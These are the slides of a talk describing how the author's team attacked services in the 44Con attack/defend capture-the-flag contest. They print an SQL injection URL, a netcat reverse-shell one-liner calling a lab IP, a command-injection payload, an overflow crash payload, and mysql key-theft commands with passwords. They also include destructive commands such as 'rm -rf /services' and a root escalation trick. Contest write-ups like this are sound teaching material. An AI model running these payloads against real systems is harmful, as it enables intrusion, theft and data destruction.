Playing the 44Con CTF for fun & profit

Me

"Three Headed Monkeys"

3hm@0xbadf00d.co.uk

@impdefined

Me

Software developerTrying not to make things worseKnow a lot about bugs

CTF team 0xbadf00d

Contributor to io.smashthestack.org

CTF

"It's kind of like a Computer Science exam on acid"*

* CSAW CTF "About"page

Solving technical security challenges to get points.

CTF Types

Challenge-basedDEF CON qualsGhost In The ShellcodeCSAW CTF

Attack/defendDEF CON finals44Con CTF (this year)

44CON CTF

44CON CTF - What we got

Virtual Machine image

IP Address

Scope of "attackable" machines

Attack & Defend

Kind of like a pentest(maybe, I've never done a pentest)

I have a plan:ReconHardenWrite exploitsRun riotGet the girlSave the world

Step 1 - Recon

I'd rather be offline than owned

Self-recon

Capture traffic

Quick nmap of non-player servers

Recon - Services

Recon - Services

Recon - Scoring

Regular "scoring rounds"Score server stores new keys in servicesScore server checks for previous keys?

Every 30 minutesNot great if you're trying to see talks!

pastie

Pastie

Pastie

Pastie

Written in PHP

Pastes stored in a MySQL databaseRecon shows keys are stored as pastes

PHP+MySQL - Can you tell what the vuln is yet?

Pastie vuln

Pastie vuln

C Classic SQL injection

Pastie fix

It's not all pwnpwnpwn

Not very sexy

Updated to use prepared statements

Pastie exploit

I want keys!

Had a look at my own DB to figure out the query

Pastie exploit

https://ip/view/%'+and+lang+=+'text'+order+by+date+desc+--+

Pastie exploit

Pastie exploit - scripted

mailserver

Mailserver

SMTP and POP3 server

Keys are stored in emails

Written in RubyI don't know Ruby~ 500 lines

Mailserver - vulnerability

Mailserver - vulnerability

???

This just runs whatever Ruby code you give it

Time to learn Ruby!

Mailserver - verification

Looking at the logs...

Mailserver - exploitation

I'm sure Ruby is lovely...

... but let's just find some code to copy

Mailserver - exploitation

Mailserver - exploitation

Mailserver - scripted exploitation

auth

Auth

Running on port 23500

Auth

Auth - vulnerability

Source analysis 101

Auth - exploitation

Auth - exploitation

Classic stack buffer overflow

Overwrite return address with value of my choice

Remote code execution.....

....right?

Auth - exploitation

Welcome to CTF rage

Auth - exploitation

Auth - exploitation

Just put a valid writable address in the buffer ptr!

Easy if this was a 32bit process.

Our memory space is annoying.

Auth - exploitationgdb$ info proc map

Mapped address spaces:

Start Addr End Addr Size Offset objfile

0x400000 0x403000 0x3000 0x0 /services/auth/auth

0x602000 0x603000 0x1000 0x2000 /services/auth/auth

0x603000 0x604000 0x1000 0x3000 /services/auth/auth

0x604000 0x625000 0x21000 0x0 [heap]

........ ........ ....... ... ......

0x7ffffffde000 0x7ffffffff000 0x21000 0x0 [stack]

0xffffffffff600000 0xffffffffff601000 0x1000 0x0 [vsyscall]

Auth - exploitationgdb$ info proc map

Mapped address spaces:

Start Addr End Addr Size Offset objfile

0x0000000000400000 0x0000000000403000 0x3000 0x0 /services/auth/auth

0x0000000000602000 0x0000000000603000 0x1000 0x2000 /services/auth/auth

0x0000000000603000 0x0000000000604000 0x1000 0x3000 /services/auth/auth

0x0000000000604000 0x0000000000625000 0x21000 0x0 [heap]

........ ........ ....... ... ......

0x00007ffffffde000 0x00007ffffffff000 0x21000 0x0 [stack]

0xffffffffff600000 0xffffffffff601000 0x1000 0x0 [vsyscall] (read-only)

Auth - exploitation

Time's up!

No remote code execution :-(

Very limited DoSCrash processRestarts automatically

servicemon

Servicemon

Web page

Looks like it monitors the other services

Ruby again

Servicemon - vulnerability

Command execution of "filelist" parameter

Servicemon - exploitation

Never mind keys, I want a shell

contestant@ubuntu:~$ nc -l 31337 -e /bin/shnc: invalid option -- 'e'

Servicemon - exploitation

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.75 31337 >/tmp/f

*cracks knuckles*

http://ip:3000/hash?filelist=notafile||rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202>%261%7Cnc%20192.168.1.75%2031337%20>%2Ftmp%2Ff

Servicemon - exploitationcontestant@ubuntu:~$ nc -lv 31337Connection from 192.168.1.72 port 31337 [tcp/*] accepted$ whoamicontestant$ pwd/services/servicemon

Now we can have some fun!

rampage

Steal all the keysmysql --user=sinatra --password=44ConCTF servicemon -e "select status from statuses order by created_at desc limit 1;"

mysql --user=pastie --password=J@cobsClub\$ paste -e "select pastie from pastie order by date desc limit 1;"

OUTPUT=redis-cli -r 1 keys \* | tail -n 1redis-cli -r 1 lrange $OUTPUT 0 1

Leave a calling card

echo 'Look behind you! A three-headed monkey!' > /services/pastie/.win

Annoy

echo 'export PROMPT_COMMAND="cd"' >> ~/.bashrc

echo exit >> ~/.bashrc

rm -rf /services

escalation

Escalation

Getting keys is fine

Getting shells is better

Getting root is best

Escalation - the hard way$ find /etc -writable/etc/init/mail.conf/etc/init/auth.conf

Escalation - the hard wayUSER PID TTY STAT COMMANDroot 8680 ? Ss /services/auth/auth

Escalation - the hard way

Next time auth respawns we will get a root shell

Lame DoS to the rescue!

perl -e 'print "auth " . "A"x1100 . "\n"' | nc ip 23500

Connection from 192.168.1.73 port 31337 [tcp/*] accepted# whoamiroot

Escalation - the easy way220 Mail Service ready (33147)HELO250 Requested mail action okay, completedEXPN respond(client, `whoami`)root

summary

Summary

CTFs are fun!

http://smashthestack.org- start with io

http://overthewire.org

http://hackthissite.org

questions